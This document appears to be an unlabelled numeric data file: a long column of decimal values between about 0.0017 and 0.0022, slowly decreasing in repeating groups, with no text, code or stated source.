0.00216663
0.00216663
0.00218058
0.00218058
0.0021666
0.00218056
0.0021666
0.00218056
0.00216175
0.00214781
0.00216176
0.00214781
0.00216177
0.00216177
0.0021486
0.00214784
0.00214784
0.00212904
0.00214297
0.00212904
0.00214297
0.0021426
0.00212907
0.00212907
0.00214299
0.00214299
0.00214788
0.00216176
0.00216179
0.00214783
0.00214807
0.00216173
0.0021597
0.0021503
0.00216172
0.00214794
0.00215031
0.00214807
0.00216173
0.0021597
0.0021503
0.00216172
0.00214794
0.00215031
0.00214301
0.00212906
0.00214297
0.00212912
0.00214301
0.00212906
0.00214298
0.00212912
0.00214294
0.00214091
0.00212917
0.00213154
0.00214294
0.00214092
0.0021293
0.00214294
0.00214091
0.00212917
0.00213154
0.00214294
0.00214092
0.0021293
0.00216177
0.00216177
0.0021486
0.00214784
0.00214784
0.00216176
0.00214781
0.00212904
0.00214297
0.0021426
0.00212907
0.00212908
0.00214299
0.00214299
0.00212905
0.00214297
0.00214807
0.00216173
0.0021597
0.0021503
0.00216172
0.00214794
0.00215031
0.00214788
0.00216176
0.00216179
0.00214783
0.00214807
0.0021597
0.00216173
0.0021503
0.00216173
0.00215031
0.00214794
0.00214301
0.00212906
0.00214297
0.00212912
0.00214294
0.00214091
0.00212917
0.00213154
0.00214294
0.00214092
0.0021293
0.00214301
0.00212906
0.00214298
0.00212912
0.00214294
0.00214091
0.00213154
0.00212917
0.00214092
0.00214294
0.0021293
0.00214788
0.00216176
0.00216179
0.00214783
0.00214807
0.0021597
0.00216173
0.0021503
0.00216173
0.00215031
0.00214794
0.00214788
0.00216176
0.00216179
0.00214783
0.00214294
0.00214091
0.00212917
0.00213154
0.00214294
0.00214092
0.0021293
0.00214301
0.00212906
0.00214298
0.00212912
0.00214294
0.00214091
0.00213154
0.00212917
0.00214092
0.00214295
0.0021293
0.00214301
0.00212906
0.00214298
0.00212912
0.00216177
0.00216177
0.0021486
0.00214784
0.00214784
0.00216176
0.00214781
0.00212905
0.00214297
0.0021426
0.00212908
0.00212907
0.00214299
0.00214299
0.00212905
0.00214297
0.00214807
0.0021597
0.00216173
0.0021503
0.00216173
0.00215031
0.00214794
0.00214788
0.00216176
0.00216179
0.00214783
0.00214788
0.00216176
0.00216179
0.00214783
0.00214294
0.00214091
0.00213154
0.00212917
0.00214092
0.00214295
0.0021293
0.00214294
0.00214091
0.00213154
0.00212917
0.00214092
0.00214294
0.0021293
0.00214301
0.00212906
0.00214298
0.00212911
0.00214301
0.00212906
0.00214298
0.00212912
0.00216176
0.00214781
0.00216176
0.00214781
0.0021426
0.00212907
0.00212907
0.00214299
0.00214299
0.00212905
0.00214297
0.00212904
0.00214297
0.00212421
0.0021103
0.00212421
0.0021103
0.00212423
0.00212423
0.00211108
0.00211033
0.00211033
0.00209157
0.00210547
0.00209157
0.00210547
0.00210509
0.0020916
0.0020916
0.00210549
0.00210549
0.00211037
0.00212421
0.00212425
0.00211031
0.00211055
0.00212418
0.00212216
0.00211278
0.00212418
0.00211042
0.00211279
0.00211055
0.00212418
0.00212216
0.00211278
0.00212418
0.00211042
0.00211279
0.0021055
0.00209159
0.00210547
0.00209164
0.0021055
0.00209159
0.00210547
0.00209164
0.00210544
0.00210341
0.00209169
0.00209406
0.00210544
0.00210343
0.00209182
0.00210544
0.00210341
0.00209169
0.00209406
0.00210544
0.00210343
0.00209182
0.00212423
0.00212423
0.00211108
0.00211033
0.00211033
0.00212421
0.0021103
0.00209157
0.00210547
0.00210509
0.0020916
0.0020916
0.00210549
0.00210549
0.00209157
0.00210547
0.00211055
0.00212418
0.00212216
0.00211278
0.00212418
0.00211042
0.00211279
0.00211037
0.00212422
0.00212425
0.00211031
0.00211055
0.00212216
0.00212418
0.00211278
0.00212418
0.00211279
0.00211042
0.00210551
0.00209159
0.00210547
0.00209164
0.00210544
0.00210341
0.00209169
0.00209406
0.00210544
0.00210342
0.00209182
0.00210551
0.00209159
0.00210547
0.00209164
0.00210544
0.00210341
0.00209406
0.00209169
0.00210343
0.00210544
0.00209182
0.00211037
0.00212422
0.00212425
0.00211031
0.00211055
0.00212216
0.00212418
0.00211278
0.00212418
0.00211279
0.00211042
0.00211037
0.00212422
0.00212425
0.00211031
0.00210544
0.00210341
0.00209169
0.00209406
0.00210544
0.00210342
0.00209182
0.00210551
0.00209159
0.00210548
0.00209164
0.00210544
0.00210341
0.00209406
0.00209169
0.00210342
0.00210544
0.00209182
0.00210551
0.00209159
0.00210548
0.00209164
0.00212423
0.00212423
0.00211108
0.00211033
0.00211033
0.00212421
0.0021103
0.00209157
0.00210547
0.00210509
0.0020916
0.0020916
0.00210549
0.00210549
0.00209157
0.00210547
0.00211055
0.00212216
0.00212418
0.00211278
0.00212418
0.00211279
0.00211042
0.00211037
0.00212421
0.00212425
0.00211031
0.00211037
0.00212421
0.00212425
0.00211031
0.00210544
0.00210341
0.00209406
0.00209169
0.00210343
0.00210544
0.00209182
0.00210544
0.00210341
0.00209406
0.00209169
0.00210343
0.00210544
0.00209182
0.00210551
0.00209159
0.00210548
0.00209164
0.00210551
0.00209159
0.00210548
0.00209164
0.00212421
0.0021103
0.00212421
0.0021103
0.00210509
0.0020916
0.0020916
0.00210549
0.00210549
0.00209157
0.00210547
0.00209157
0.00210547
0.00208675
0.00207286
0.00208675
0.00207286
0.00208677
0.00208677
0.00207364
0.00207289
0.00207289
0.00205417
0.00206805
0.00205417
0.00206805
0.00206766
0.0020542
0.0020542
0.00206807
0.00206807
0.00207293
0.00208675
0.00208678
0.00207288
0.00207311
0.00208672
0.00208471
0.00207534
0.00208672
0.00207298
0.00207535
0.00207311
0.00208673
0.00208471
0.00207533
0.00208672
0.00207298
0.00207535
0.00206808
0.00205419
0.00206805
0.00205424
0.00206808
0.00205419
0.00206805
0.00205424
0.00206801
0.00206599
0.00205429
0.00205666
0.00206802
0.002066
0.00205442
0.00206801
0.00206599
0.00205429
0.00205666
0.00206802
0.002066
0.00205442
0.00208677
0.00208677
0.00207364
0.00207289
0.00207289
0.00208675
0.00207286
0.00205417
0.00206805
0.00206765
0.0020542
0.0020542
0.00206807
0.00206807
0.00205417
0.00206805
0.00207311
0.00208672
0.00208471
0.00207534
0.00208672
0.00207298
0.00207535
0.00207293
0.00208675
0.00208678
0.00207288
0.00207311
0.00208471
0.00208672
0.00207533
0.00208672
0.00207535
0.00207298
0.00206808
0.00205419
0.00206805
0.00205424
0.00206801
0.00206599
0.00205429
0.00205666
0.00206802
0.002066
0.00205442
0.00206808
0.00205419
0.00206805
0.00205424
0.00206801
0.00206599
0.00205666
0.00205429
0.002066
0.00206802
0.00205442
0.00207293
0.00208675
0.00208678
0.00207288
0.00207311
0.00208471
0.00208672
0.00207533
0.00208672
0.00207535
0.00207298
0.00207293
0.00208675
0.00208678
0.00207288
0.00206801
0.00206598
0.00205429
0.00205666
0.00206802
0.002066
0.00205442
0.00206808
0.00205419
0.00206805
0.00205424
0.00206801
0.00206599
0.00205666
0.00205429
0.002066
0.00206802
0.00205441
0.00206808
0.00205419
0.00206805
0.00205424
0.00208677
0.00208677
0.00207364
0.00207289
0.00207289
0.00208675
0.00207286
0.00205417
0.00206805
0.00206766
0.0020542
0.0020542
0.00206807
0.00206807
0.00205417
0.00206805
0.00207311
0.00208471
0.00208672
0.00207533
0.00208672
0.00207535
0.00207298
0.00207293
0.00208675
0.00208678
0.00207288
0.00207293
0.00208675
0.00208678
0.00207288
0.00206801
0.00206598
0.00205666
0.00205429
0.002066
0.00206802
0.00205442
0.00206801
0.00206599
0.00205666
0.00205429
0.002066
0.00206802
0.00205442
0.00206808
0.00205419
0.00206805
0.00205424
0.00206808
0.00205419
0.00206805
0.00205424
0.00208675
0.00207286
0.00208675
0.00207286
0.00206765
0.0020542
0.0020542
0.00206807
0.00206807
0.00205417
0.00206805
0.00205417
0.00206805
0.00204936
0.0020355
0.00204936
0.0020355
0.00204938
0.00204938
0.00203627
0.00203553
0.00203553
0.00201685
0.0020307
0.00201685
0.0020307
0.00203029
0.00201688
0.00201688
0.00203072
0.00203072
0.00203557
0.00204937
0.0020494
0.00203552
0.00203574
0.00204934
0.00204732
0.00203796
0.00204933
0.00203562
0.00203798
0.00203574
0.00204934
0.00204732
0.00203796
0.00204933
0.00203562
0.00203798
0.00203073
0.00201686
0.0020307
0.00201691
0.00203073
0.00201687
0.0020307
0.00201691
0.00203066
0.00202863
0.00201697
0.00201933
0.00203067
0.00202865
0.00201709
0.00203066
0.00202863
0.00201697
0.00201933
0.00203067
0.00202865
0.00201709
0.00204938
0.00204938
0.00203627
0.00203553
0.00203553
0.00204936
0.0020355
0.00201685
0.0020307
0.00203029
0.00201688
0.00201688
0.00203072
0.00203071
0.00201685
0.0020307
0.00203574
0.00204934
0.00204732
0.00203796
0.00204933
0.00203562
0.00203798
0.00203557
0.00204937
0.0020494
0.00203552
0.00203574
0.00204732
0.00204934
0.00203796
0.00204933
0.00203798
0.00203562
0.00203073
0.00201687
0.0020307
0.00201691
0.00203066
0.00202863
0.00201697
0.00201933
0.00203067
0.00202865
0.00201709
0.00203073
0.00201687
0.0020307
0.00201691
0.00203066
0.00202863
0.00201933
0.00201697
0.00202865
0.00203067
0.00201709
0.00203556
0.00204937
0.00204939
0.00203552
0.00203574
0.00204732
0.00204934
0.00203796
0.00204933
0.00203798
0.00203562
0.00203556
0.00204937
0.00204939
0.00203552
0.00203065
0.00202863
0.00201696
0.00201933
0.00203067
0.00202865
0.00201708
0.00203072
0.00201686
0.0020307
0.00201691
0.00203066
0.00202863
0.00201933
0.00201696
0.00202865
0.00203067
0.00201708
0.00203073
0.00201686
0.0020307
0.00201691
0.00204938
0.00204938
0.00203627
0.00203553
0.00203553
0.00204936
0.0020355
0.00201685
0.0020307
0.00203029
0.00201688
0.00201688
0.00203072
0.00203072
0.00201685
0.0020307
0.00203574
0.00204732
0.00204934
0.00203796
0.00204933
0.00203798
0.00203562
0.00203557
0.00204937
0.0020494
0.00203552
0.00203557
0.00204937
0.0020494
0.00203552
0.00203066
0.00202863
0.00201933
0.00201696
0.00202865
0.00203067
0.00201708
0.00203066
0.00202863
0.00201933
0.00201696
0.00202865
0.00203067
0.00201708
0.00203073
0.00201686
0.0020307
0.00201691
0.00203073
0.00201686
0.0020307
0.00201691
0.00204936
0.0020355
0.00204936
0.0020355
0.00203029
0.00201688
0.00201688
0.00203071
0.00203072
0.00201685
0.0020307
0.00201685
0.0020307
0.00201205
0.00199822
0.00201205
0.00199822
0.00201207
0.00201207
0.00199898
0.00199825
0.00199825
0.00197962
0.00199343
0.00197962
0.00199343
0.00199301
0.00197965
0.00197965
0.00199345
0.00199345
0.00199828
0.00201206
0.00201208
0.00199824
0.00199845
0.00201202
0.00201001
0.00200067
0.00201201
0.00199833
0.00200069
0.00199845
0.00201203
0.00201001
0.00200067
0.00201201
0.00199833
0.00200069
0.00199346
0.00197963
0.00199343
0.00197968
0.00199346
0.00197963
0.00199343
0.00197968
0.00199339
0.00199136
0.00197973
0.00198208
0.0019934
0.00199138
0.00197984
0.00199339
0.00199136
0.00197973
0.00198208
0.0019934
0.00199138
0.00197984
0.00201207
0.00201207
0.00199898
0.00199825
0.00199825
0.00201205
0.00199822
0.00197962
0.00199343
0.00199301
0.00197964
0.00197964
0.00199345
0.00199345
0.00197962
0.00199343
0.00199845
0.00201203
0.00201001
0.00200067
0.00201201
0.00199833
0.00200069
0.00199828
0.00201206
0.00201208
0.00199824
0.00199845
0.00201001
0.00201203
0.00200067
0.00201201
0.00200069
0.00199833
0.00199346
0.00197963
0.00199343
0.00197968
0.00199339
0.00199136
0.00197973
0.00198208
0.0019934
0.00199138
0.00197984
0.00199346
0.00197963
0.00199343
0.00197968
0.00199339
0.00199136
0.00198208
0.00197973
0.00199138
0.0019934
0.00197984
0.00199828
0.00201205
0.00201208
0.00199823
0.00199845
0.00201001
0.00201202
0.00200067
0.00201201
0.00200069
0.00199833
0.00199828
0.00201205
0.00201208
0.00199823
0.00199339
0.00199136
0.00197973
0.00198208
0.0019934
0.00199138
0.00197984
0.00199346
0.00197963
0.00199343
0.00197967
0.00199339
0.00199136
0.00198208
0.00197973
0.00199138
0.0019934
0.00197984
0.00199346
0.00197963
0.00199343
0.00197967
0.00201207
0.00201207
0.00199898
0.00199825
0.00199825
0.00201205
0.00199822
0.00197962
0.00199343
0.00199301
0.00197965
0.00197964
0.00199345
0.00199345
0.00197962
0.00199343
0.00199845
0.00201001
0.00201202
0.00200067
0.00201201
0.00200069
0.00199833
0.00199828
0.00201206
0.00201208
0.00199823
0.00199828
0.00201205
0.00201208
0.00199823
0.00199339
0.00199136
0.00198208
0.00197973
0.00199138
0.0019934
0.00197984
0.00199339
0.00199136
0.00198208
0.00197973
0.00199138
0.0019934
0.00197984
0.00199346
0.00197963
0.00199343
0.00197967
0.00199346
0.00197963
0.00199343
0.00197967
0.00201205
0.00199822
0.00201205
0.00199822
0.00199301
0.00197964
0.00197964
0.00199345
0.00199345
0.00197961
0.00199343
0.00197962
0.00199343
0.00197484
0.00196104
0.00197484
0.00196104
0.00197485
0.00197485
0.00196178
0.00196107
0.00196107
0.0019425
0.00195627
0.0019425
0.00195627
0.00195584
0.00194253
0.00194253
0.00195629
0.00195629
0.0019611
0.00197484
0.00197486
0.00196106
0.00196126
0.00197481
0.00197278
0.00196347
0.00197479
0.00196115
0.0019635
0.00196126
0.00197481
0.00197278
0.00196347
0.00197479
0.00196115
0.0019635
0.00195629
0.00194252
0.00195627
0.00194256
0.00195629
0.00194252
0.00195627
0.00194256
0.00195622
0.00195419
0.00194261
0.00194495
0.00195624
0.00195422
0.00194272
0.00195622
0.00195419
0.00194261
0.00194495
0.00195624
0.00195422
0.00194272
0.00197485
0.00197485
0.00196178
0.00196107
0.00196107
0.00197483
0.00196104
0.0019425
0.00195627
0.00195584
0.00194253
0.00194253
0.00195629
0.00195628
0.0019425
0.00195627
0.00196126
0.00197481
0.00197278
0.00196347
0.00197479
0.00196115
0.0019635
0.0019611
0.00197484
0.00197486
0.00196106
0.00196127
0.00197278
0.00197481
0.00196347
0.00197479
0.00196349
0.00196115
0.00195629
0.00194252
0.00195627
0.00194256
0.00195622
0.00195419
0.00194261
0.00194495
0.00195624
0.00195422
0.00194272
0.00195629
0.00194252
0.00195627
0.00194256
0.00195622
0.00195419
0.00194495
0.00194261
0.00195422
0.00195624
0.00194272
0.0019611
0.00197484
0.00197486
0.00196105
0.00196126
0.00197278
0.0019748
0.00196347
0.00197479
0.00196349
0.00196115
0.0019611
0.00197484
0.00197486
0.00196105
0.00195622
0.00195419
0.00194261
0.00194495
0.00195624
0.00195422
0.00194272
0.00195629
0.00194252
0.00195627
0.00194256
0.00195622
0.00195419
0.00194495
0.00194261
0.00195421
0.00195624
0.00194272
0.00195629
0.00194252
0.00195627
0.00194256
0.00197485
0.00197485
0.00196178
0.00196107
0.00196107
0.00197483
0.00196104
0.0019425
0.00195627
0.00195584
0.00194253
0.00194253
0.00195629
0.00195629
0.0019425
0.00195627
0.00196126
0.00197279
0.0019748
0.00196347
0.00197478
0.0019635
0.00196115
0.0019611
0.00197484
0.00197486
0.00196106
0.0019611
0.00197484
0.00197486
0.00196106
0.00195622
0.00195419
0.00194495
0.00194261
0.00195422
0.00195624
0.00194272
0.00195622
0.00195419
0.00194495
0.00194261
0.00195422
0.00195624
0.00194272
0.00195629
0.00194252
0.00195627
0.00194256
0.00195629
0.00194252
0.00195627
0.00194256
0.00197483
0.00196104
0.00197483
0.00196104
0.00195584
0.00194253
0.00194253
0.00195628
0.00195629
0.0019425
0.00195627
0.0019425
0.00195627
0.00193774
0.001924
0.00193774
0.001924
0.00193776
0.00193776
0.00192473
0.00192403
0.00192403
0.00190555
0.00191926
0.00190555
0.00191925
0.00191881
0.00190558
0.00190558
0.00191927
0.00191927
0.00192406
0.00193774
0.00193776
0.00192402
0.00192422
0.00193771
0.00193569
0.00192641
0.00193769
0.00192411
0.00192644
0.00192422
0.00193771
0.00193569
0.00192641
0.00193769
0.00192411
0.00192644
0.00191927
0.00190556
0.00191926
0.0019056
0.00191927
0.00190557
0.00191926
0.0019056
0.0019192
0.00191718
0.00190565
0.00190798
0.00191922
0.0019172
0.00190576
0.0019192
0.00191718
0.00190565
0.00190798
0.00191922
0.0019172
0.00190576
0.00193776
0.00193776
0.00192473
0.00192403
0.00192403
0.00193774
0.001924
0.00190555
0.00191926
0.00191881
0.00190558
0.00190558
0.00191927
0.00191927
0.00190555
0.00191925
0.00192422
0.00193771
0.00193569
0.00192641
0.00193769
0.00192411
0.00192644
0.00192406
0.00193774
0.00193776
0.00192402
0.00192421
0.00193569
0.00193771
0.00192641
0.00193769
0.00192644
0.00192411
0.00191927
0.00190557
0.00191926
0.0019056
0.0019192
0.00191718
0.00190565
0.00190798
0.00191922
0.0019172
0.00190576
0.00191927
0.00190557
0.00191926
0.0019056
0.0019192
0.00191718
0.00190798
0.00190565
0.0019172
0.00191922
0.00190576
0.00192406
0.00193774
0.00193776
0.00192402
0.00192422
0.00193569
0.00193771
0.00192641
0.00193769
0.00192644
0.00192411
0.00192406
0.00193774
0.00193776
0.00192402
0.0019192
0.00191718
0.00190565
0.00190798
0.00191922
0.0019172
0.00190576
0.00191927
0.00190557
0.00191925
0.0019056
0.0019192
0.00191718
0.00190798
0.00190566
0.0019172
0.00191922
0.00190576
0.00191927
0.00190557
0.00191926
0.0019056
0.00193776
0.00193776
0.00192473
0.00192403
0.00192403
0.00193774
0.00192401
0.00190555
0.00191925
0.00191881
0.00190558
0.00190558
0.00191927
0.00191927
0.00190556
0.00191926
0.00192422
0.00193569
0.00193771
0.00192641
0.00193769
0.00192644
0.00192411
0.00192406
0.00193774
0.00193777
0.00192402
0.00192406
0.00193775
0.00193777
0.00192402
0.0019192
0.00191718
0.00190798
0.00190565
0.0019172
0.00191922
0.00190576
0.0019192
0.00191718
0.00190798
0.00190566
0.0019172
0.00191922
0.00190576
0.00191928
0.00190557
0.00191926
0.00190561
0.00191928
0.00190557
0.00191926
0.00190561
0.00193774
0.00192401
0.00193774
0.00192401
0.00191881
0.00190558
0.00190558
0.00191927
0.00191927
0.00190556
0.00191926
0.00190556
0.00191926
0.00190082
0.00188715
0.00190082
0.00188716
0.00190083
0.00190083
0.00188787
0.00188718
0.00188718
0.00186883
0.00188245
0.00186883
0.00188244
0.00188199
0.00186885
0.00186885
0.00188246
0.00188245
0.00188721
0.00190082
0.00190084
0.00188718
0.00188736
0.00190078
0.00189877
0.00188955
0.00190076
0.00188726
0.00188958
0.00188736
0.00190079
0.00189877
0.00188955
0.00190076
0.00188726
0.00188958
0.00188246
0.00186885
0.00188244
0.00186888
0.00188246
0.00186885
0.00188245
0.00186888
0.00188238
0.00188037
0.00186893
0.00187124
0.00188241
0.0018804
0.00186903
0.00188238
0.00188037
0.00186893
0.00187124
0.00188241
0.0018804
0.00186903
0.00190083
0.00190083
0.00188788
0.00188719
0.00188719
0.00190082
0.00188716
0.00186885
0.00188245
0.001882
0.00186886
0.00186886
0.00188246
0.00188246
0.00186884
0.00188245
0.00188736
0.00190078
0.00189877
0.00188955
0.00190076
0.00188726
0.00188957
0.00188721
0.00190082
0.00190084
0.00188717
0.00188736
0.00189877
0.00190078
0.00188955
0.00190076
0.00188958
0.00188726
0.00188246
0.00186884
0.00188244
0.00186888
0.00188238
0.00188037
0.00186893
0.00187124
0.00188241
0.0018804
0.00186903
0.00188246
0.00186885
0.00188244
0.00186888
0.00188238
0.00188037
0.00187124
0.00186893
0.0018804
0.00188241
0.00186903
0.00188721
0.00190082
0.00190084
0.00188718
0.00188737
0.00189878
0.00190079
0.00188955
0.00190076
0.00188958
0.00188726
0.00188721
0.00190082
0.00190084
0.00188718
0.00188238
0.00188038
0.00186893
0.00187124
0.00188241
0.00188041
0.00186904
0.00188246
0.00186885
0.00188245
0.00186889
0.00188239
0.00188038
0.00187125
0.00186894
0.00188041
0.00188241
0.00186904
0.00188246
0.00186885
0.00188245
0.00186889
0.00190083
0.00190083
0.00188788
0.00188718
0.00188718
0.00190082
0.00188716
0.00186884
0.00188244
0.00188199
0.00186886
0.00186886
0.00188245
0.00188246
0.00186884
0.00188245
0.00188737
0.00189877
0.00190079
0.00188955
0.00190077
0.00188958
0.00188726
0.00188721
0.00190082
0.00190084
0.00188718
0.00188721
0.00190082
0.00190084
0.00188718
0.00188238
0.00188037
0.00187124
0.00186893
0.0018804
0.00188241
0.00186904
0.00188239
0.00188038
0.00187125
0.00186893
0.0018804
0.00188241
0.00186903
0.00188246
0.00186885
0.00188245
0.00186888
0.00188246
0.00186885
0.00188245
0.00186888
0.00190082
0.00188717
0.00190082
0.00188717
0.001882
0.00186886
0.00186886
0.00188246
0.00188246
0.00186884
0.00188245
0.00186884
0.00188245
0.00186414
0.00185058
0.00186414
0.00185058
0.00186415
0.00186415
0.00185128
0.0018506
0.0018506
0.00183241
0.0018459
0.00183241
0.0018459
0.00184544
0.00183243
0.00183243
0.00184591
0.00184591
0.00185063
0.00186414
0.00186415
0.0018506
0.00185077
0.0018641
0.0018621
0.00185294
0.00186407
0.00185067
0.00185297
0.00185077
0.0018641
0.0018621
0.00185294
0.00186407
0.00185068
0.00185298
0.00184591
0.00183242
0.0018459
0.00183245
0.00184591
0.00183242
0.00184591
0.00183245
0.00184583
0.00184384
0.0018325
0.00183478
0.00184586
0.00184387
0.0018326
0.00184584
0.00184384
0.0018325
0.00183478
0.00184587
0.00184387
0.0018326
0.00186415
0.00186415
0.00185129
0.0018506
0.00185061
0.00186414
0.00185059
0.00183241
0.00184591
0.00184545
0.00183243
0.00183243
0.00184592
0.00184592
0.00183241
0.00184591
0.00185077
0.0018641
0.0018621
0.00185294
0.00186407
0.00185067
0.00185297
0.00185062
0.00186414
0.00186415
0.00185059
0.00185077
0.00186209
0.0018641
0.00185294
0.00186407
0.00185297
0.00185067
0.00184591
0.00183242
0.0018459
0.00183245
0.00184583
0.00184384
0.0018325
0.00183478
0.00184586
0.00184387
0.00183259
0.00184591
0.00183242
0.0018459
0.00183245
0.00184583
0.00184384
0.00183478
0.0018325
0.00184387
0.00184586
0.00183259
0.00185063
0.00186414
0.00186415
0.0018506
0.00185078
0.0018621
0.00186411
0.00185295
0.00186408
0.00185298
0.00185068
0.00185063
0.00186414
0.00186415
0.0018506
0.00184584
0.00184384
0.0018325
0.00183479
0.00184587
0.00184387
0.0018326
0.00184592
0.00183242
0.00184591
0.00183245
0.00184584
0.00184384
0.00183479
0.0018325
0.00184387
0.00184587
0.0018326
0.00184592
0.00183243
0.00184591
0.00183245
0.00186415
0.00186415
0.00185128
0.0018506
0.0018506
0.00186414
0.00185059
0.00183241
0.0018459
0.00184544
0.00183242
0.00183243
0.00184591
0.00184592
0.00183241
0.00184591
0.00185077
0.0018621
0.00186411
0.00185295
0.00186408
0.00185298
0.00185068
0.00185063
0.00186414
0.00186415
0.0018506
0.00185063
0.00186414
0.00186415
0.0018506
0.00184583
0.00184384
0.00183478
0.0018325
0.00184387
0.00184587
0.0018326
0.00184584
0.00184384
0.00183478
0.0018325
0.00184387
0.00184587
0.0018326
0.00184591
0.00183242
0.00184591
0.00183245
0.00184592
0.00183242
0.00184591
0.00183245
0.00186414
0.00185059
0.00186414
0.00185059
0.00184545
0.00183243
0.00183243
0.00184592
0.00184592
0.00183242
0.00184591
0.00183242
0.00184591
0.00182775
0.00181432
0.00182775
0.00181432
0.00182776
0.00182776
0.00181499
0.00181433
0.00181433
0.0017963
0.00180968
0.0017963
0.00180968
0.0018092
0.00179631
0.00179631
0.00180968
0.00180968
0.00181435
0.00182775
0.00182776
0.00181433
0.00181449
0.00182771
0.00182571
0.00181664
0.00182768
0.0018144
0.00181666
0.0018145
0.00182771
0.00182571
0.00181664
0.00182768
0.0018144
0.00181667
0.00180968
0.0017963
0.00180968
0.00179633
0.00180968
0.0017963
0.00180967
0.00179633
0.0018096
0.00180761
0.00179637
0.00179862
0.00180964
0.00180763
0.00179647
0.0018096
0.00180761
0.00179638
0.00179862
0.00180963
0.00180763
0.00179647
0.00182776
0.00182776
0.00181499
0.00181433
0.00181433
0.00182775
0.00181432
0.0017963
0.00180968
0.0018092
0.00179631
0.00179631
0.00180968
0.00180968
0.00179629
0.00180967
0.00181449
0.00182771
0.00182571
0.00181664
0.00182768
0.0018144
0.00181667
0.00181435
0.00182775
0.00182776
0.00181432
0.00181449
0.00182571
0.00182771
0.00181664
0.00182768
0.00181667
0.0018144
0.00180968
0.0017963
0.00180968
0.00179632
0.0018096
0.00180761
0.00179637
0.00179862
0.00180963
0.00180763
0.00179646
0.00180968
0.0017963
0.00180967
0.00179632
0.0018096
0.00180761
0.00179862
0.00179637
0.00180763
0.00180963
0.00179646
0.00181435
0.00182775
0.00182776
0.00181432
0.00181449
0.00182572
0.00182772
0.00181664
0.00182768
0.00181667
0.0018144
0.00181435
0.00182776
0.00182776
0.00181432
0.0018096
0.00180761
0.00179637
0.00179863
0.00180963
0.00180764
0.00179646
0.00180968
0.0017963
0.00180967
0.00179632
0.0018096
0.00180761
0.00179863
0.00179637
0.00180764
0.00180963
0.00179647
0.00180968
0.0017963
0.00180967
0.00179633
0.00182776
0.00182776
0.00181499
0.00181433
0.00181433
0.00182775
0.00181431
0.00179629
0.00180967
0.0018092
0.00179631
0.0017963
0.00180968
0.00180968
0.00179629
0.00180967
0.00181449
0.00182571
0.00182771
0.00181664
0.00182768
0.00181666
0.0018144
0.00181435
0.00182775
0.00182776
0.00181432
0.00181435
0.00182775
0.00182776
0.00181432
0.0018096
0.00180761
0.00179862
0.00179637
0.00180763
0.00180963
0.00179647
0.0018096
0.00180761
0.00179862
0.00179637
0.00180763
0.00180963
0.00179646
0.00180968
0.0017963
0.00180967
0.00179632
0.00180968
0.0017963
0.00180967
0.00179633
0.00182776
0.00181432
0.00182776
0.00181432
0.0018092
0.0017963
0.0017963
0.00180968
0.00180968
0.00179629
0.00180968
0.00179629
0.00180968
0.00179167
0.00177834
0.00179167
0.00177834
0.00179168
0.00179168
0.001779
0.00177836
0.00177836
0.00176046
0.00177374
0.00176045
0.00177374
0.00177325
0.00176047
0.00176046
0.00177374
0.00177374
0.00177837
0.00179167
0.00179167
0.00177835
0.00177851
0.00179163
0.00178963
0.00178063
0.00179159
0.00177842
0.00178065
0.00177851
0.00179163
0.00178963
0.00178063
0.00179159
0.00177842
0.00178065
0.00177374
0.00176046
0.00177374
0.00176048
0.00177374
0.00176046
0.00177373
0.00176048
0.00177366
0.00177167
0.00176053
0.00176275
0.00177369
0.00177169
0.00176062
0.00177366
0.00177167
0.00176053
0.00176275
0.00177369
0.00177169
0.00176062
0.00179168
0.00179168
0.001779
0.00177836
0.00177836
0.00179167
0.00177834
0.00176046
0.00177374
0.00177325
0.00176047
0.00176046
0.00177374
0.00177374
0.00176045
0.00177374
0.00177851
0.00179163
0.00178963
0.00178063
0.00179159
0.00177842
0.00178065
0.00177837
0.00179167
0.00179167
0.00177835
0.00177851
0.00178963
0.00179163
0.00178063
0.00179159
0.00178065
0.00177842
0.00177374
0.00176046
0.00177374
0.00176048
0.00177365
0.00177167
0.00176053
0.00176275
0.00177369
0.00177169
0.00176061
0.00177373
0.00176046
0.00177373
0.00176048
0.00177365
0.00177167
0.00176275
0.00176053
0.00177169
0.00177369
0.00176062
0.00177837
0.00179167
0.00179167
0.00177835
0.0017785
0.00178963
0.00179163
0.00178063
0.00179159
0.00178065
0.00177841
0.00177837
0.00179167
0.00179167
0.00177835
0.00177365
0.00177167
0.00176053
0.00176275
0.00177369
0.00177169
0.00176061
0.00177373
0.00176046
0.00177373
0.00176048
0.00177365
0.00177167
0.00176275
0.00176052
0.00177169
0.00177369
0.00176061
0.00177373
0.00176046
0.00177373
0.00176048
0.00179168
0.00179167
0.001779
0.00177835
0.00177835
0.00179167
0.00177834
0.00176045
0.00177374
0.00177325
0.00176047
0.00176046
0.00177374
0.00177374
0.00176045
0.00177373
0.0017785
0.00178963
0.00179162
0.00178063
0.00179159
0.00178065
0.00177841
0.00177837
0.00179167
0.00179167
0.00177835
0.00177837
0.00179167
0.00179167
0.00177834
0.00177365
0.00177167
0.00176275
0.00176053
0.00177169
0.00177369
0.00176061
0.00177365
0.00177167
0.00176275
0.00176052
0.00177169
0.00177369
0.00176061
0.00177373
0.00176046
0.00177373
0.00176048
0.00177373
0.00176045
0.00177373
0.00176048
0.00179167
0.00177834
0.00179167
0.00177834
0.00177325
0.00176046
0.00176046
0.00177374
0.00177374
0.00176045
0.00177373
0.00176045
0.00177373
0.00175587
0.00174262
0.00175587
0.00174262
0.00175587
0.00175587
0.00174327
0.00174263
0.00174263
0.00172485
0.00173804
0.00172484
0.00173805
0.00173756
0.00172485
0.00172485
0.00173805
0.00173805
0.00174265
0.00175586
0.00175586
0.00174263
0.00174278
0.00175582
0.00175382
0.00174488
0.00175578
0.00174269
0.00174491
0.00174278
0.00175582
0.00175382
0.00174488
0.00175578
0.0017427
0.0017449
0.00173804
0.00172485
0.00173804
0.00172487
0.00173804
0.00172485
0.00173804
0.00172487
0.00173796
0.00173598
0.00172492
0.00172711
0.00173799
0.001736
0.001725
0.00173796
0.00173598
0.00172491
0.00172711
0.00173799
0.001736
0.001725
0.00175587
0.00175586
0.00174327
0.00174263
0.00174263
0.00175586
0.00174262
0.00172484
0.00173805
0.00173755
0.00172485
0.00172485
0.00173805
0.00173804
0.00172484
0.00173804
0.00174278
0.00175582
0.00175382
0.00174488
0.00175577
0.0017427
0.00174491
0.00174265
0.00175586
0.00175586
0.00174263
0.00174278
0.00175382
0.00175582
0.00174488
0.00175577
0.00174491
0.0017427
0.00173804
0.00172485
0.00173804
0.00172487
0.00173796
0.00173598
0.00172492
0.00172712
0.001738
0.00173601
0.001725
0.00173804
0.00172485
0.00173805
0.00172487
0.00173795
